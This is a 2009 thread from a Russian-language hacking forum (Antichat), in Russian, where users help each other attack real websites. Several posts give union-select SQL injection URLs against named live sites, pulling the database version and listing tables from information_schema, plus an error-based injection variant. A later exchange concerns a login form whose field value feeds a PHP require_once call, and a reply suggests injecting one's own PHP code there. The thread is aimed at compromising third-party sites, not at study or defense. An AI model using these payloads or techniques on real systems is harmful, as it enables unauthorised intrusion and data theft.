17.05.2009, 14:26
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
diznt, стукни в аську мне, 674542, накатаю.
|
|
|
17.05.2009, 14:53
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
|
|
|
|
17.05.2009, 14:56
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
2 ПаВлУшКа:
http://www.fshsh.org/lajmi.php?id=-47+union+select+1,2,@@version,4,5--
|
|
|
|
17.05.2009, 15:02
|
|
Новичок
Регистрация: 08.02.2009
Сообщений: 24
С нами:
9081715
Репутация:
10
|
|
Pashkela, а дальше? Как узнать имена таблиц, колонок?
|
|
|
|
17.05.2009, 15:05
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
С нами:
10262314
Репутация:
668
|
|
через information_schema пробуй =)
|
|
|
|
17.05.2009, 15:11
|
|
Новичок
Регистрация: 08.02.2009
Сообщений: 24
С нами:
9081715
Репутация:
10
|
|
Doom123, естественно через нее, вот только не выводится ничего..
|
|
|
|
17.05.2009, 15:53
|
|
Участник форума
Регистрация: 15.03.2009
Сообщений: 231
С нами:
9030403
Репутация:
146
|
|
что можно дальше с этим сделать?
Но можно воспользоваться аналогом "more that 1 row".
http://www.e3e5.com/author.php?id=-1018))+union+select+null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null+ from+author+where+((1=(select+1,2)+
|
|
|
|
17.05.2009, 16:05
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
2 ПаВлУшКа:
А дальше включать мосг, подумав решить, что ЭТА скуля тупая и нам не нужна и найти на этом же сайте другую, ХОРОШУЮ скулю:
Код:
http://www.fshsh.org/kalendaridetaj.php?id=-4+union+select+1,2,3,4,version()
Код:
http://www.fshsh.org/kalendaridetaj.php?id=-4+union+select+1,2,3,4,table_name+from+information_schema.tables
|
|
|
|
17.05.2009, 20:28
|
|
Новичок
Регистрация: 27.03.2008
Сообщений: 4
С нами:
9538650
Репутация:
1
|
|
Подскажите:
Есть форма авторизации там есть
<select id="number" name="number">
<OPTION value="aa">1</OPTION>
<OPTION value="bb">2</OPTION>
<OPTION value="cc">3</OPTION>
<OPTION value="dd">4</OPTION>
</select>
и кнопка отправки, данные форма передаёт файлу login.php
после изменения в форме value="aa" например на value="aa2" то после отправки запроса выдаёт ошибку примерно такого содержания
Код:
Warning: require_once(configaa2.php) [function.require-once]: failed to open stream: No such file or directory in /var/www/site/htdocs/login.php on line 103 Fatal error: require_once() [function.require]: Failed opening required 'configaa2.php' (include_path='.:/usr/share/php5:/usr/share/php') in /var/www/site/htdocs/login.php on line 103
Подскажите что можно тут выполнить?например чтонибудь связаное с инклудом другого файла
p.s извеняйте за обьяснение, как смог( |
|
|
|
17.05.2009, 23:12
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от Aleksandeer
Подскажите:
Есть форма авторизации там есть
<select id="number" name="number">
<OPTION value="aa">1</OPTION>
<OPTION value="bb">2</OPTION>
<OPTION value="cc">3</OPTION>
<OPTION value="dd">4</OPTION>
</select>
и кнопка отправки, данные форма передаёт файлу login.php
после изменения в форме value="aa" например на value="aa2" то после отправки запроса выдаёт ошибку примерно такого содержания
Код:
Warning: require_once(configaa2.php) [function.require-once]: failed to open stream: No such file or directory in /var/www/site/htdocs/login.php on line 103 Fatal error: require_once() [function.require]: Failed opening required 'configaa2.php' (include_path='.:/usr/share/php5:/usr/share/php') in /var/www/site/htdocs/login.php on line 103
Подскажите что можно тут выполнить?например чтонибудь связаное с инклудом другого файла
p.s извеняйте за обьяснение, как смог( а можно ссылку посмотреть?
может там можно произвести php-injection по принципу закрыть функцию подключения конфига ");" и вставить свой рнр код...
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
